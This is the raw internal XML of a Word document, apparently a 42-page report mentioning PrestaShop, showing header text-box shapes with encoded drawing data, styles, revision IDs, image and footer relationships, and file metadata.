      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="6"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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 20" o:spid="_x0000_s4101" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:185.15pt;height:17.75pt;z-index:-122392;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical:top;mso-position-vertical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nDGoQIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1vmzAQ/j5p/8Hyd8pLCA0opGpCmCZ1&#10;L1K3H+CACdbAZrYT6Kr9951NSNNWk6ZtfLAO+/z4nrvnbnkztA06UqmY4Cn2rzyMKC9Eyfg+xV+/&#10;5M4CI6UJL0kjOE3xA1X4ZvX2zbLvEhqIWjQllQhAuEr6LsW11l3iuqqoaUvUlegoh8NKyJZo+JV7&#10;t5SkB/S2cQPPi9xeyLKToqBKwW42HuKVxa8qWuhPVaWoRk2KITZtV2nXnVnd1ZIke0m6mhWnMMhf&#10;RNESxuHRM1RGNEEHyV5BtayQQolKXxWidUVVsYJaDsDG916wua9JRy0XSI7qzmlS/w+2+Hj8LBEr&#10;UxzPIow4aaFIKLCJ6TuVwPl9Bx56WIsBCmxJqu5OFN8U5M698DE5V4ky3rv+gygBiBy0sDeGSrYm&#10;PUAYAQxU4uGcfTpoVMBmMJv7Mz/EqICzIJhHs8CUxyXJdLuTSr+jokXGSLGE6lp0crxTenSdXMxj&#10;XOSsaWyFG/5sAzDHHXgbrpozE4Ut2GPsxdvFdhE6YRBtndDLMuc234ROlPvX82yWbTaZ/9O864dJ&#10;zcqScvPMJB4//LPinGQ8lv0sHyUaVho4E5KS+92mkehIQLy5/U4JuXBzn4dh8wVcXlDyg9BbB7GT&#10;R4trJ8zDuRNfewvH8+N1HHlhHGb5c0p3jNN/p4R60NU8mI+q+S03z36vuZGkZRrGQ8PaFC/OTiSp&#10;KSm3vLSl1YQ1o32RChP+Uyqg3FOhrWCNRke16mE3WPWD7gDNCHgnygeQsBSgMNApzDYwaiF/YNTD&#10;nEix+n4gkmLUvOfQiGaoTIacjN1kEF7A1RRrjEZzo8fhc+gk29eAPHYUF7fQKhWzKn6K4tRg0PuW&#10;zGlOmeFy+W+9nqbp6hcAAAD//wMAUEsDBBQABgAIAAAAIQCE15Ma3QAAAAcBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/BTsMwEETvSPyDtUjcqJPQAApxKlRUcUAcWkDiuI1NHBGvo9hN3b9nOdHjaEYz&#10;b+pVcoOYzRR6TwryRQbCUOt1T52Cj/fNzQOIEJE0Dp6MgpMJsGouL2qstD/S1sy72AkuoVChAhvj&#10;WEkZWmschoUfDbH37SeHkeXUST3hkcvdIIssu5MOe+IFi6NZW9P+7A5Owed63LymL4tvc6lfnov7&#10;7Wlqk1LXV+npEUQ0Kf6H4Q+f0aFhpr0/kA5iYL0sco4q4Edsl3mxBLFXcFuWIJtanvM3vwAAAP//&#10;AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDWXnDGoQIAAJUFAAAOAAAAAAAAAAAAAAAAAC4CAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCE15Ma3QAAAAcBAAAPAAAAAAAAAAAAAAAAAPsE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAABQYAAAAA&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 20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margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 19" o:spid="_x0000_s4100" type="#_x0000_t202" style="position:absolute;margin-left:421pt;margin-top:744.45pt;width:113.75pt;height:14pt;z-index:-12236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IArogIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtu3CAQfa/Uf0C8O7a37MVWvFGyXleV&#10;0ouU9gNYG69RMbjArp1W/fcOON5sElWq2vKABhiGOXMOc3k1tAIdmTZcyQzHFxFGTJaq4nKf4S+f&#10;i2CFkbFUVlQoyTJ8zwy+Wr9+ddl3KZupRomKaQRBpEn7LsONtV0ahqZsWEvNheqYhMNa6ZZaWOp9&#10;WGnaQ/RWhLMoWoS90lWnVcmMgd18PMRrH7+uWWk/1rVhFokMQ27Wz9rPOzeH60ua7jXtGl4+pEH/&#10;IouWcgmPnkLl1FJ00PxFqJaXWhlV24tStaGqa14yjwHQxNEzNHcN7ZjHAsUx3alM5v+FLT8cP2nE&#10;qwwnb+YYSdoCSShOXGH6zqRwfteBhx1u1AAEe5Cmu1XlVwMu4ZnPeME4713/XlUQiB6s8jeGWreu&#10;PAAYQRhg4v5UfTZYVLrYhJDFDJIo4SxeLleRpyek6XS708a+ZapFzsiwBnZ9dHq8NdZlQ9PJxT0m&#10;VcGF8AwL+WQDHMcdeBuuujOXhSfsRxIl29V2RQIyW2wDEuV5cF1sSLAo4uU8f5NvNnn8070bk7Th&#10;VcWke2YST0z+jJwHGY+0n+RjlOCVC+dSMnq/2wiNjhTEW/jhaIHkz9zCp2n4Y8DyDFI8I9HNLAmK&#10;xWoZkILMg2QZrYIoTm6SRUQSkhdPId1yyf4dEupBV3Pg1MP5LbbIj5fYaNpyC+1B8DbDIAcY44dt&#10;GK22svLUWsrFaJ+VwqX/WAqo2ES0F6zT6KhWO+wGr/54Pil+p6p7kLBWoDDQKfQ2MBqlv2PUQ5/I&#10;sPl2oJphJN5J+IiuqUyGnozdZFBZwtUMW4xGc2PH5nPoNN83EHn8UVJdw1epuVex+1NjFgDBLeDv&#10;ezAPfco1l/O193rsputfAAAA//8DAFBLAwQUAAYACAAAACEA9/1jv+MAAAAOAQAADwAAAGRycy9k&#10;b3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KjTqAlJiFOhoooD4tACEkc3NnFEvI5iN3X/nu2J3nY0&#10;o9k39Tragc168r1DActFAkxj61SPnYDPj+1DAcwHiUoODrWAs/awbm5valkpd8KdnvehY1SCvpIC&#10;TAhjxblvjbbSL9yokbwfN1kZSE4dV5M8UbkdeJokObeyR/pg5Kg3Rre/+6MV8LUZt2/x28j3OVOv&#10;L+nj7jy1UYj7u/j8BCzoGP7DcMEndGiI6eCOqDwbBBSrlLYEMlZFUQK7RJK8zIAd6MqWeQm8qfn1&#10;jOYPAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJ9SAK6ICAACVBQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA9/1jv+MAAAAOAQAADwAAAAAAAAAA&#10;AAAAAAD8BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAwGAAAAAA==&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 19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519C" w:rsidRDefault="00E643D1">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="2"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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 12" o:spid="_x0000_s4099" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:198.25pt;height:14.95pt;z-index:-122200;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical:top;mso-position-vertical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v3OnwIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNuOmzAQfa/Uf7D8znIpyQYUstqEUFXa&#10;XqRtP8ABE6yC7dpOYFv13zs2IZvdVaWqLQ/WYI/Hc+acmeXN0LXoSJVmgmc4vAoworwUFeP7DH/5&#10;XHgLjLQhvCKt4DTDD1Tjm9XrV8tepjQSjWgrqhAE4TrtZYYbY2Tq+7psaEf0lZCUw2EtVEcM/Kq9&#10;XynSQ/Su9aMgmPu9UJVUoqRaw24+HuKVi1/XtDQf61pTg9oMQ27GrcqtO7v6qyVJ94rIhpWnNMhf&#10;ZNERxuHRc6icGIIOir0I1bFSCS1qc1WKzhd1zUrqMACaMHiG5r4hkjosUBwtz2XS/y9s+eH4SSFW&#10;ZTiJgCpOOiAJhZEtTC91Cuf3EjzMsBYDEOxAanknyq8aXPwLn/GCtt67/r2oIBA5GOFuDLXqbHkA&#10;MIIwwMTDufp0MKiEzWgWXs/mCUYlnIVJAOzaLHySTrel0uYtFR2yRoYVsOuik+OdNqPr5GIf46Jg&#10;bQv7JG35kw2IOe7A23DVntksHGE/kiDZLraL2Iuj+daLgzz3botN7M0LyC9/k282efjTvhvGacOq&#10;inL7zCSeMP4zck4yHmk/y0eLllU2nE1Jq/1u0yp0JCDewn2ngly4+U/TcPUCLM8ghVEcrKPEK+aL&#10;ay8u4pmXXAcLLwiTdTIP4iTOi6eQ7hin/w4J9aCrWTQbVfNbbEA1fC+xkbRjBsZDy7oML85OJG0o&#10;qba8ctQawtrRviiFTf+xFED3RLQTrNXoqFYz7Aan/tBpzap5J6oHkLASoDDQKcw2MBqhvmPUw5zI&#10;sP52IIpi1L7j0Ih2qEyGmozdZBBewtUMG4xGc2PG4XOQiu0biDx2FBe30Co1cyp+zOLUYND7Dsxp&#10;TtnhcvnvvB6n6eoXAAAA//8DAFBLAwQUAAYACAAAACEAju9lo94AAAAHAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPwU7DMBBE70j8g7VI3KjTQEsb4lSoqOJQcWgBiaMbL3FEvI5iN3X/nuVUjqMZzbwp&#10;V8l1YsQhtJ4UTCcZCKTam5YaBR/vm7sFiBA1Gd15QgVnDLCqrq9KXRh/oh2O+9gILqFQaAU2xr6Q&#10;MtQWnQ4T3yOx9+0HpyPLoZFm0Ccud53Ms2wunW6JF6zucW2x/tkfnYLPdb/Zpi+r38aZeX3JH3fn&#10;oU5K3d6k5ycQEVO8hOEPn9GhYqaDP5IJomP9kE85qoAfsT27X8xBHBTkyyXIqpT/+atfAAAA//8D&#10;AFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFIG/c6fAgAAlQUAAA4AAAAAAAAAAAAAAAAALgIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAI7vZaPeAAAABwEAAA8AAAAAAAAAAAAAAAAA+QQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAEBgAAAAA=&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 12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margin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60A42" w:rsidRDefault="00360A42">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00360A42" w:rsidRDefault="00360A4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F5A4139"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C95078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F9A7AA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4EF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4832F2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4EF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0D90A4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB2034BC"/>
    <w:lvl w:ilvl="0" w:tplc="40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6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8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0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2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4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6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8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01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5122"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="4"/>
    </o:shapelayout>
  </w:hdrShapeDefaults>
  <w:footnotePr>
    <w:footnote w:id="-1"/>
    <w:footnote w:id="0"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="-1"/>
    <w:endnote w:id="0"/>
  </w:endnotePr>
  <w:compat>
    <w:ulTrailSpace/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00390B00"/>
    <w:rsid w:val="00030BD3"/>
    <w:rsid w:val="0006143F"/>
    <w:rsid w:val="000A4069"/>
    <w:rsid w:val="000F00A0"/>
    <w:rsid w:val="000F17B3"/>
    <w:rsid w:val="0015039B"/>
    <w:rsid w:val="00151C86"/>
    <w:rsid w:val="00197DA7"/>
    <w:rsid w:val="002218A6"/>
    <w:rsid w:val="00224C7B"/>
    <w:rsid w:val="002350CB"/>
    <w:rsid w:val="00291626"/>
    <w:rsid w:val="00296621"/>
    <w:rsid w:val="0035180C"/>
    <w:rsid w:val="00360A42"/>
    <w:rsid w:val="00363221"/>
    <w:rsid w:val="00390B00"/>
    <w:rsid w:val="00392C9A"/>
    <w:rsid w:val="003D03C4"/>
    <w:rsid w:val="00401CBD"/>
    <w:rsid w:val="00466BEB"/>
    <w:rsid w:val="004B1B81"/>
    <w:rsid w:val="004B3E99"/>
    <w:rsid w:val="004C3EDF"/>
    <w:rsid w:val="004F2A1E"/>
    <w:rsid w:val="00571599"/>
    <w:rsid w:val="005B6F48"/>
    <w:rsid w:val="005F07E8"/>
    <w:rsid w:val="006966BD"/>
    <w:rsid w:val="00780195"/>
    <w:rsid w:val="007A11B5"/>
    <w:rsid w:val="007A19F9"/>
    <w:rsid w:val="008577E0"/>
    <w:rsid w:val="008E066F"/>
    <w:rsid w:val="008E5DFD"/>
    <w:rsid w:val="008F220A"/>
    <w:rsid w:val="00947564"/>
    <w:rsid w:val="009A05B7"/>
    <w:rsid w:val="00A01965"/>
    <w:rsid w:val="00A1459A"/>
    <w:rsid w:val="00A735D3"/>
    <w:rsid w:val="00A913FB"/>
    <w:rsid w:val="00AB4449"/>
    <w:rsid w:val="00AE4681"/>
    <w:rsid w:val="00AE4A5C"/>
    <w:rsid w:val="00B11EA4"/>
    <w:rsid w:val="00B95B7F"/>
    <w:rsid w:val="00C30C54"/>
    <w:rsid w:val="00C564BF"/>
    <w:rsid w:val="00C94E44"/>
    <w:rsid w:val="00C96185"/>
    <w:rsid w:val="00CD2C75"/>
    <w:rsid w:val="00CF4123"/>
    <w:rsid w:val="00D4195F"/>
    <w:rsid w:val="00D52D70"/>
    <w:rsid w:val="00D569E9"/>
    <w:rsid w:val="00D72989"/>
    <w:rsid w:val="00D748F9"/>
    <w:rsid w:val="00DC27EC"/>
    <w:rsid w:val="00DD1B6A"/>
    <w:rsid w:val="00DE122E"/>
    <w:rsid w:val="00E141B2"/>
    <w:rsid w:val="00E2341D"/>
    <w:rsid w:val="00E54A23"/>
    <w:rsid w:val="00E5519C"/>
    <w:rsid w:val="00E60381"/>
    <w:rsid w:val="00E643D1"/>
    <w:rsid w:val="00ED1477"/>
    <w:rsid w:val="00F43E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E643D1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E643D1"/>
    <w:pPr>
      <w:ind w:left="3322" w:right="3507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1"/>
    <w:qFormat/>
    <w:rsid w:val="00E643D1"/>
    <w:pPr>
      <w:ind w:left="221" w:right="3507"/>
      <w:jc w:val="center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E643D1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E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE4A5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4A5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E4A5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4A5C"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59"/>
    <w:rsid w:val="00F43ECE"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsi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odyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00947564"/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947564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13F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3FB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hyperlink" Target="http://www.prestashop.com/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpe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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10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8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId87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44.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpeg"/><Relationship Id="rId90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footer" Target="footer3.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpe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59.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpe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jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId67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27.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpeg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70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7.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.prestashop.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml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0.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpe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0B3852-592F-42ED-9BCF-66CB4AC3D1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42</Pages>
  <Words>935</Words>
  <Characters>5333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Saurabh Lahoti</dc:creator>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <cp:lastPrinted>2018-01-03T18:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-19T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-19T08:26:00Z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2015-12-26T00:00:00Z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2017-12-05T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>